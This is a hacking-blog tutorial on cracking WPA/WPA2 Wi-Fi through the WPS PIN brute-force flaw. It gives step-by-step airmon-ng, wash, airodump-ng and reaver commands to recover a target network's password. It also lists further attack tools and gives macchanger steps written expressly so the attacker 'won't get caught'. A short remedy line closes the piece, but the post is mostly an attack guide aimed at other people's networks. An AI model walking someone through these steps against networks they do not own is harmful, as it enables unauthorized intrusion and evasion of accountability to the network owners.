Sneaker's Stub - The Grey Stuff!

Wireless Hacking (WPA/WPA2)

Wireless Hacking is a wide topic. It is a never ending topic and the more you will talk about it the more things you will know so wrapping up this vast topic in just one article wouldn’t be fair, So first we will be talking about WPA/WPA2 encrypted wireless hacking.

Wi-Fi stands for Wireless Fidelity. WPA/WPA2(Wi-fi Protected Access/Wi-fi Protected Access 2) were created in response to the weakness on WEP(Wired Equivalent Privacy).Older Wireless devices comes with WEP algorithm which are short length encryption using RC4 Encryption Algorithm (Known as Stream Cipher) with 40-bit shared key.With such short length the key can be known easily. For More Visit this LINK.

So Keeping WEP Algorithm is not actually a good idea keeping privacy and security in mind. To overcome this problem,WPA/WPA2 were created.

Since 2006, they both are best up-to-date algorithms that implemented on wireless networks and systems. But this was till December 2011 when Stefan Viehböck revealed a very serious flaw in WPA/WPA2 and reported it to US-CERT. The vulnerability was in the wireless devices which uses WPS-Wifi Protected setup which allows new devices to be connected to them. Wifi Protected Setup was created for the home user or small businesses so they can easily setup the device password.The recent models have it enabled by default. It is an extra feature which offers automatic setup of WPA2 between a router and a wireless device. The PIN number goes in two halves for verification so brute-forcing 4 digits twice will be lot more easier and will take less time than brute-forcing all 8 digits at once.

WPS uses a Pin containing 8 unknown number which can be easily guessed by automatic brute-forcing in just a few hours. This wouldn’t be a problem because after so many “bad-requests” the wireless routers locks itself out. But in WPS, they don’t lock out and as a result an attacker could brute-force the PIN. The PIN is a personal identification number for wireless router.

8 Digit PIN
Above image shows Serial no, MAC Address and 8 digit PIN.

Now, After this (kind of) brief explanation I’m going to show you how to check for active WPS mode in wireless devices and eventually hacking into them.

Though there are several ways and yes there are all over the internet and you can reach for those once you know what is actual vulnerability.

OS Required for pulling out this task:

Linux or Kali or Backtrack and Some tools and Hell lot of PATIENCE.

Lets start Cracking!

  • We first have to put our wireless NIC in monitor mode. The monitor mode is nothing but promiscuous mode…So it catches every packet it is getting from all around.
    • airmon-ng start wlan0 (wlan0 is the wireless interface) 
  • wash is the command which is used to show WPS enabled networks around.
    • wash -i mon0 (-i is the interface with monitor mode on, mon0 is the monitor mode for the interface wlan0).
  • Now we need to dump all the networks around us and show us their specification like are they WPA or WPA-PSK etc.
    • airodump-ng mon0
  • While during airodump-ng mon0, you will be seeing ESSID (The network name could be anything provided by admin of the network) and BSSID (which you have to copy, It is the MAC address of the device).Once you have the BSSID you can start the Reaver.
    • reaver -i mon0 -b ff:ff:ff:ff:ff:ff (The ff:ff:ff:ff:ff:ff here denotes the 48-bit MAC address of the corresponding device whose password you’re trying to crack.)

It will take 3-7 hours for Reaver to brute-force pin and then provide you with the password. Patience is must. I won’t be telling you about aircrack-ng though thats a powerful tool to use but only and if only you got a word-list of exact password that you think might be used by the target wireless network. It doesn’t work for me (I’m just bad at guessing stuff :P )so I’m not gonna tell you that but if you wanna know about that go ahead and search the web how to use it.

Other Tools for exploiting WPS vulnerability:

  • Bully
  • Wifite
  • Wpscrack
  • Pixie-dust

You can change the mac address of your device while brute-forcing so you won’t get caught :P

To change the back Follow the Steps:

  1. ifconfig is used for wired Ethernet LAN interfaces and iwconfig is used for wireless interfaces installed in your device,So since we are using wireless interface, In the command line write
    1.  ifconfig wlan0  —>This command will provide you with original mac address of your interface is using.
  2. Before changing mac address you have to turn off the interface. Otherwise it will provide you with an error and it couldn’t change the mac address
    1. ifconfig wlan0 downadapterbusy
  3. Now you can use macchanger on it
    1. machanger -A wlan0

changemac

  1. Then put on the interface again
    1. ifconfig wlan0 up      –>There you go with changed mac address!!

 

Remedy:

Turn off your WPS setup after setting up the password.

Wanna Read More:

  1. http://www.howtogeek.com/204697/wi-fi-security-should-you-use-wpa2-aes-wpa2-tkip-or-both/
  2. http://null-byte.wonderhowto.com/how-to/hack-wifi-using-wps-pixie-dust-attack-0162671/
  3. http://null-byte.wonderhowto.com/how-to/hack-wpa-wifi-passwords-by-cracking-wps-pin-0132542/
  4. https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access

But No matter What you do just

Stay Anonymous :)

Ciao!



Leave a Reply